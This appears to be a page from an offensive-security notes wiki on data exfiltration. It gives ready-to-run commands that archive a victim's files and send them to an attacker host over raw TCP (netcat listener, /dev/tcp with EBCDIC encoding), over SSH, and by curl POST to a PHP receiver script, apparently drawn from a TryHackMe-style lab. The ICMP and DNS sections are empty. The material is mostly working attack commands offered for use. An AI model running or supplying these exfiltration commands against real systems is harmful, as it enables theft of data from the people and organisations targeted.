☣️Data Exfiltration

Data exfil via TCP

The first machine is listening over TCP on port 1337
The other machine connects to the port specified in step 1. For example, nc 1.2.3.4 1337
The first machine establishes the connection
Finally, the sending and receiving data starts. For example, the attacker sends commands and receives results.

This is easy to detect for IDS and network sniffers, as well as XDR.

Attacker: Open port 8080

nc -lvlp 8080 > /tmp/stolen.data

Victim: Send data via TCP

tar zcf - data/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.20/8080

Attacker: Retore data

dd conv=ascii if=stolen.data |base64 -d > stolen.tar
tar xvf stolen.tar

Data exfil via SSH

Victim: Send data to Attacker

tar cf - data/ | ssh [email protected] "cd /tmp/; tar xpf -"

Data exfil via HTTP

Data handler for Webserver

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

Victim: POST data to Webserver

curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php

Data exfil via ICMP

Data exfil via DNS and DNS Tunneling

--placeholder--

PreviousLog4Shell NextPersistance

Last updated 2 years ago